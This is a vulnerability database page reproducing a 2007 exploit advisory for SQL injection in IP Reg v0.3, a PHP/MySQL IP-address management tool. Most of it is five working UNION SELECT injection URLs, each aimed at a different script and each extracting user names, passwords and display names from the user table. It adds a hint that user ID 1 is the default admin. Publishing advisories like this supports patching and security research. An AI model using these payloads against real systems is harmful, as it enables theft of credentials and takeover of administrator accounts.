Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

ipreg-sql.txt

🗓️ 24 Dec 2007 00:00:00Reported by MhZ91Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Ip Reg v0.3 - Remote Sql Injection in IPAM too

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
Multiple Remote Sql Injection  
  
---------------------------------------------------------------  
  
# Author: MhZ91   
# Title: Ip Reg v0.3 - Remote Sql Injection  
# Download: http://sourceforge.net/project/showfiles.php?group_id=211757  
# Bug: Remote Sql Injection  
# Info: IP Reg is a IPAM tool to keep track of assets, nodes (IP addresses, MAC addresses, DNS aliases) within different subnets, over different locations or even VLAN's. Written in PHP, use it with a MySQL-database to have a unique insight in your local network  
# Visit: http://www.inj3ct-it.org  
  
---------------------------------------------------------------  
  
http://[site]/vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
There is other more sql injection.  
  
For get user, password and status of the members, u must edit [UserID] whit number.. The number 1 it's the default id of the admin.  
---------------------------------------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
remote sql injectionphpmysql-databasenetwork securityuser information
24
.json
Report